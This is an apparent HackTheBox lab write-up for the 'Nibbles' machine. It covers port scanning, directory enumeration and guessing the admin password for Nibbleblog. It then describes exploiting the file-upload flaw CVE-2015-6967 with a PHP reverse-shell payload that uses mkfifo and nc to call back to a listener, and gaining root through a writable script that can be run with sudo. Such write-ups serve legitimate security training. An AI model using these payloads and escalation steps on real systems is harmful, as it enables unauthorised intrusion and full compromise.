Hackthebox - Nibbles

  • Linux


sudo nmap -T4 -sC -sV -O -Pn -p- 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-10 17:33 EST
Nmap scan report for
Host is up (0.055s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.58 seconds

Port 80

  • If we browse there we have an hello world.

  • If we check the source code, we have an interesting comment

  • This brings us here

  • Let's see what info we have with whatweb

Enumerate dir in nibbleblog

└──╼ $gobuster dir -u --wordlist /usr/share/wordlists/dirb/common.txt 
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2023/02/11 08:07:07 Starting gobuster in directory enumeration mode
/.hta                 (Status: 403) [Size: 301]
/.htpasswd            (Status: 403) [Size: 306]
/admin                (Status: 301) [Size: 321] [-->]
/admin.php            (Status: 200) [Size: 1401]                                          
/.htaccess            (Status: 403) [Size: 306]                                           
/content              (Status: 301) [Size: 323] [-->]
/index.php            (Status: 200) [Size: 2987]                                            
/languages            (Status: 301) [Size: 325] [-->]
/plugins              (Status: 301) [Size: 323] [-->]  
/README               (Status: 200) [Size: 4628]                                              
/themes               (Status: 301) [Size: 322] [-->]   
2023/02/11 08:07:22 Finished
  • Admin

  • Readme

  • Content

  • Plugins

  • Thèmes

  • Admin.php

  • We also find multiple xml files. The users.xml and config.xml seem interesting

  • Users

<user username="admin">
<id type="integer">0</id>
<session_fail_count type="integer">0</session_fail_count>
<session_date type="integer">1514544131</session_date>
<blacklist type="string" ip="">
<date type="integer">1512964659</date>
<fail_count type="integer">1</fail_count>
  • Config

<name type="string">Nibbles</name>
<slogan type="string">Yum yum</slogan>
<footer type="string">Powered by Nibbleblog</footer>
<advanced_post_options type="integer">0</advanced_post_options>
<url type="string"></url>
<path type="string">/nibbleblog/</path>
<items_rss type="integer">4</items_rss>
<items_page type="integer">6</items_page>
<language type="string">en_US</language>
<timezone type="string">UTC</timezone>
<timestamp_format type="string">%d %B, %Y</timestamp_format>
<locale type="string">en_US</locale>
<img_resize type="integer">1</img_resize>
<img_resize_width type="integer">1000</img_resize_width>
<img_resize_height type="integer">600</img_resize_height>
<img_resize_quality type="integer">100</img_resize_quality>
<img_resize_option type="string">auto</img_resize_option>
<img_thumbnail type="integer">1</img_thumbnail>
<img_thumbnail_width type="integer">190</img_thumbnail_width>
<img_thumbnail_height type="integer">190</img_thumbnail_height>
<img_thumbnail_quality type="integer">100</img_thumbnail_quality>
<img_thumbnail_option type="string">landscape</img_thumbnail_option>
<theme type="string">simpler</theme>
<notification_comments type="integer">1</notification_comments>
<notification_session_fail type="integer">0</notification_session_fail>
<notification_session_start type="integer">0</notification_session_start>
<notification_email_to type="string">admin@nibbles.com</notification_email_to>
<notification_email_from type="string">noreply@</notification_email_from>
<seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
<seo_site_description type="string"/>
<seo_keywords type="string"/>
<seo_robots type="string"/>
<seo_google_code type="string"/>
<seo_bing_code type="string"/>
<seo_author type="string"/>
<friendly_urls type="integer">0</friendly_urls>
<default_homepage type="integer">0</default_homepage>
  • This confirm that a user named admin exist.

  • We can not bruteforce because of the IP blacklist that is set as a protection.

  • The word nibbles frequently comes back. Let's try it as a password for admin. It works.

  • While looking for info on nibbleblog we found a CVE: CVE-2015-6967

  • It is also worth having a look around

  • This way we find a plugin "My image" that allows us to upload files

  • Let's try to upload a php file and see if it gets executed. Here is our php file

  • The file seems to be uploaded when we explored the files previously there was a content directory, so our file is probably there somewhere let's have a look. Yes there is a new image.php file here

  • And our command (ls) works, we have command execution!

  • We could do a webshell. But let's try for a reverse shell.

  • Let's edit our previous file <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444) >/tmp/f'); ?>

  • We now need to set a listener rlwrap nc -lnvp 4444

  • We get a shell

  • Along with the flag we have zip personal.zip that seems interesting for later.

Privilege escalation

  • Let's have a look at the zip file. There is stuff folder with a bash script inside

  • Using sudo -l we see that we are able to run it as root

  • Let's add this in our script this will launch bash as root and should allow us to get root /bin/bash echo '/bin/bash' | tee -a /home/nibbler/personal/stuff/monitor.sh.

  • Indeed if we sudo /home/nibbler/personal/stuff/monitor.sh we get root and can grab the last flag

Last updated